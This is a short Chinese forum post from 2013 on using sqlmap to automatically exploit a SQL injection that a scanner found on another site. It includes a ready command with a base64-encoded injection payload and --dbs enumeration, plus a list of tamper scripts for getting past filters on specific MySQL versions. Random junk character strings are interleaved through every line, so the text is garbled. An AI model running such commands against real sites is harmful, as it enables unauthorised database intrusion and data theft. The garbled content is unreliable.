WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
) a* W' o( h1 j+ B' m% g2 @7 Y
, ] y5 z6 d/ B A9 hsqlmap的tamper里有个base64encode.py
7 W7 a0 k8 c$ G# b, z' J# y: i! d' Z) w9 X# ?$ S
使用如下( }9 ?2 Y! ~& [, D! E
/ U' I- e- B+ y4 ?sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs; e- x& A! Y, d
- Z5 x2 V6 r3 G3 E* k* d
1 X$ ~5 u- V7 w. i3 dsqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”, }9 r: H+ w$ o1 s
8 ?( h/ D2 o$ `: m) h其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
$ q9 y$ p" p K; \5 ^, [ [! E' K+ I: _" L2 O" s! `
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
; F2 V) r* T1 M0 X( K% Uspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入& J. W1 |0 P8 S7 I1 G
首先确定目标数据库版本,然后选择相应的脚本。
: X$ X. B/ l1 a7 Y; o$ P( [. a-v 3 --batch --tamper "space2hash.py"* H! b4 w7 }/ }2 x' `1 O r# v
( ~/ v- u, N' b" Z还有其他一些插件:! f4 \3 L# b6 o) U5 ^
encodes编码 ——charencode.py
2 e& V# K/ F* X: V' D! xbase64编码 —— base64encode.py; }/ M* K+ H6 |0 E4 [2 _
替换空格和关键字 —— halfversionedmorekeywords.py
: z; B* L# T) s7 I# l( l5 u. j |
' o7 V7 q0 e2 D3 q# Z
" \7 d3 u1 L( \
; y( M9 C" u. }+ n' @$ z" M- s1 B/ z% J/ `# P2 A$ n Z% U
|
发表于 2013-11-23 15:50:45
收藏
支持
反对